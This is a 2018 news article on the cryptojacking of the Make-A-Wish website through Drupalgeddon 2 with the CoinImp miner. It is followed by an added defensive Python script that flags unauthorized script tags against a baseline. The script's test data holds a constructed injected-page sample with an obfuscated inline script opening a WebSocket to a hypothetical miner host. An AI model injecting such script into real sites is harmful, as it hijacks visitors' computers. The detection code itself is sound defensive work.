UPDATED 20:50 EDT / NOVEMBER 19 2018


Make-A-Wish website cryptojacked with increasingly popular CoinImp script

Proving that some hackers have no morals whatsoever, the website of the Make-A-Wish Foundation has been “cryptojacked” to install the increasingly popular cryptomining script.

Discovered by Simon Kenin, a security researcher at Trustwave SpiderLabs, and publicized today, the hack involved unknown hackers accessing the Make-A-Wish website through a Drupal vulnerability dubbed Drupalgeddon 2.

A Drupalgeddon 2 attack takes advantage of Drupal installations that have not patched CVE-2018-7600 and CVE-2018-7602, two vulnerabilities that were first targeted by cryptomining hackers in May.

Although the attack was notable for its target, prompting The Register to ask, “Do they accept Monero in hell?” the more interesting part of the attack was the deployment of an increasingly popular form of cryptomining script.

Called CoinImp, the coin mining script first became available in December and works in a similar fashion to market leader Coinhive. Users insert JavaScript code on a website, and visitors to the site have their computers hijacked to mine Monero, or another cryptocurrency called webchain.network, for as long as they remain on the page.

CoinImp takes a 1 percent fee on mined cryptocurrency and also offers a referral program that allows script users to sign up others to get a percentage of what their referrals mine.

“What’s interesting about this particular campaign is that it uses different techniques to avoid static detections,” Kenin wrote. “It starts with changing the domain name that hosts the JavaScript miner, which is itself obfuscated…. The WebSocket proxy also uses different domains and IPs which make blacklist solutions obsolete.”

The script's ability to evade traditional blacklist-based defenses, such as antivirus software and similar products, may lead to more attacks that use it.

“The CoinIMP cryptominer is growing rapidly in popularity and the combination of a well-trafficked charity site paired with the season of giving made this the perfect target for a large-scale cyberattack,” a spokesperson for Trustwave told SiliconANGLE.

Kenin noted that enterprises and other website owners should deploy endpoint protection capable of detecting cryptominers, monitor changes to their websites and audit those changes to make sure they were authorized, and always keep their website software up to date with patches.
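As an added illustration of the "monitor and audit changes" advice, not code from the article or from Trustwave, the following script keeps an approved baseline of the `<script>` tags a page serves and flags any script that is not in that baseline, which catches an injected miner loader regardless of which domain it currently uses. The page content and miner hostnames are constructed and hypothetical.

```python
import hashlib
import re
from html.parser import HTMLParser

# Constructed sample: an approved page baseline and the same page after an
# unknown script has been injected (hypothetical hosts, not real indicators).
BASELINE_HTML = """<html><head><script src="/sites/all/themes/site/js/main.js"></script>
<script>var analytics = {site: 'wish'};</script></head><body>Hi</body></html>"""
INJECTED_HTML = """<html><head><script src="/sites/all/themes/site/js/main.js"></script>
<script>var analytics = {site: 'wish'};</script>
<script src="https://cdn.example-miner.invalid/m.js"></script>
<script>var _0x1a=['wss://ws.example-miner.invalid'];new WebSocket(_0x1a[0]);</script>
</head><body>Hi</body></html>"""

class ScriptCollector(HTMLParser):
    """Records every <script> on a page: external ones by src, inline ones by content hash."""
    def __init__(self):
        super().__init__()
        self.scripts = []          # list of (kind, identifier, raw_text)
        self._in_script = False
        self._buf = []
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src, ""))
        else:
            self._in_script, self._buf = True, []
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf)
            digest = hashlib.sha256(body.encode()).hexdigest()[:16]
            self.scripts.append(("inline", digest, body))
            self._in_script = False

def script_inventory(html):
    p = ScriptCollector()
    p.feed(html)
    return p.scripts

def unauthorized_scripts(baseline_html, current_html):
    """Return scripts present now but absent from the approved baseline.
    Any WebSocket endpoint in an unknown inline script is listed, since
    browser miners stream their work over WebSocket proxies."""
    known = {(k, i) for k, i, _ in script_inventory(baseline_html)}
    findings = []
    for kind, ident, body in script_inventory(current_html):
        if (kind, ident) in known:
            continue
        sockets = re.findall(r"wss?://[^\s'\"]+", body)
        findings.append({"kind": kind, "id": ident, "websockets": sockets})
    return findings
```

Each finding is a change to review against the site's deployment records; the baseline is refreshed only after a change is confirmed as authorized.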

Image: CoinImp
